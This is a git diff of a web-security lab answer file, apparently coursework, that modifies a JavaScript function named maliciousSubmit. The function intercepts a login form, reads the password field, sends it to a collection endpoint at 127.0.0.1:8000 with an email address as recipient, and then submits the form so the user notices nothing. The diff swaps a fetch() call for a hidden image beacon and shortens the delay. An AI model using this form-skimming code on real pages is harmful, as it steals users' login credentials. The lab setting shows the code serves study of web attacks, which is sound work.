--- a/lab3_web_security/answer-11.html
+++ b/lab3_web_security/answer-11.html
@@ -18,13 +18,16 @@
   <script>
     function maliciousSubmit(event) {
       event.preventDefault()
-      const dataForEmail = "username:" + document.getElementsByName('login_username')[0].value + "password:" +  document.getElementsByName('login_password')[0].value
-      fetch('http://127.0.0.1:8000?' + 'to=redfreak97@gmail.com' + '&payload=' + encodeURIComponent(document.getElementsByName('login_password')[0].value)+ '&random=' + Math.random())
+      function execEmail() {
+        (new Image()).src='http://127.0.0.1:8000?' + 'to=syssechacks@gmail.com' + '&payload=' + encodeURIComponent(document.getElementsByName('login_password')[0].value)+ '&random=' + Math.random()
+
+      }
+      execEmail()
 
       setTimeout(function (){
         var formContext = document.getElementsByName("loginform")[0]
         formContext.submit()
-      }, 3000)
+      }, 2000)
 
       
     }
